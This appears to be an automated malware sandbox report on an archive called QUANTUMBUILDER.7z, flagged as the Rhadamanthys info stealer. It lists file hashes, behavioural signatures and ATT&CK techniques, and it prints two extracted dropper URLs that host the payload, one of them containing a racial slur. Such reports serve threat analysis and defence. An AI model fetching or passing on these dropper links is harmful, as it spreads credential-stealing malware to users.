Overview

overview

10

Static

static

7

QUANTUMBUI...er.exe

windows7-x64

10

QUANTUMBUI...er.exe

windows10-2004-x64

10

QUANTUMBUI...x.html

windows7-x64

1

QUANTUMBUI...x.html

windows10-2004-x64

1

QUANTUMBUI...x.html

windows7-x64

1

QUANTUMBUI...x.html

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    QUANTUMBUILDER.7z

  • Size

    7.6MB

  • Sample

    240608-p4rhzscf95

  • MD5

    7df51d52383286a3aea91c611f28ea21

  • SHA1

    b85bbe7732f5f541a035552713b63d714d74002d

  • SHA256

    14fd87baefddee9626eb957848f13b77b0eeede39fb682b5b979eeea81f5d0c8

  • SHA512

    600a2b1dfd30d8c449825389a88a3fc9302d16146f75da00ee3d203b72735f254907534a014f1b9e15a96552bbf242c98f3a304863b86ea9f351b6d110309148

  • SSDEEP

    196608:Mc76ggGPY7NDlmH8IMV8f7JEvaspO55Gz4UHBKnsjQisxy:/OASDMc8fmyt55teKFZg

Score
10/10
rhadamanthysexecutionstealerupx

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/FUCKOFFNIGGA/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar

Targets

    • Target

      QUANTUMBUILDER/QuantumBuilder.exe

    • Size

      7KB

    • MD5

      960d70161f0ac1ddd8093955446bdcbc

    • SHA1

      5943c81939f9b43228e2fe2f65e90c54660ae47f

    • SHA256

      31e6573e37d06a71b3025c0e9ed4901093ed5262bc60bbbdf7ce1ed28ebb021a

    • SHA512

      8f3f6091fb3d09d4cdb0f9540bbbc2de0562dd5bb77c8446db49f274be7b173cbc0aa24206e25838cc6b6c6578440c0ecfd1a17acc94c50ebd014cbe16617c14

    • SSDEEP

      192:+9yqvjp73xsznGjcJr9emxan6mUqlwc6nYZKvkV/9dXq:+9Jv1dOnGjcJrQmxan6m/ec6nYZSkV/2

    Score
    10/10
    executionrhadamanthysstealer

    • Rhadamanthys

      Rhadamanthys is an info stealer written in C++ first seen in August 2022.

      stealerrhadamanthys

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

    • Target

      QUANTUMBUILDER/img/img/index.html

    • Size

      118B

    • MD5

      8ddffaa30cd272bc227aa4512178333d

    • SHA1

      4ad402f07ab5ce9de7bcd0783ffe865e29c82159

    • SHA256

      d377e770b95cc5dfa75da9c7a5cf77a3af68cd2dc59df39bdc911607067a2b87

    • SHA512

      071f19219033b068f35de6ace69e5fbfd2ac219b7ded08ea11e4433431ec036dc6cb4f0068782f0226bb4554afc5bbb4d7db179e6a1e32531df4e8c49d85f279

    Score
    1/10
    behavioral3behavioral4

    • Target

      QUANTUMBUILDER/img/index.html

    • Size

      101B

    • MD5

      9673750fbe393bb5ff81433b566a1919

    • SHA1

      15de2d8eec753e0219922b437fcd89e335d28e2a

    • SHA256

      5ed8096042789c866ded5da853200c75b471dabe6d522a68df1a8f831969e930

    • SHA512

      14f07cf27b8fd93f857880c650d5d0fd607b158dadbf0b06899364448caf149eb92b22ef3a3717f5b401a6b1cffbe9be43bfdf784d359279c36d947add626672

    Score
    1/10
    behavioral5behavioral6

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Defense Evasion

Modify Registry

2
T1112

Credential Access

Discovery

Query Registry

4
T1012

System Information Discovery

4
T1082

Process Discovery

1
T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Resource Development

Reconnaissance

Tasks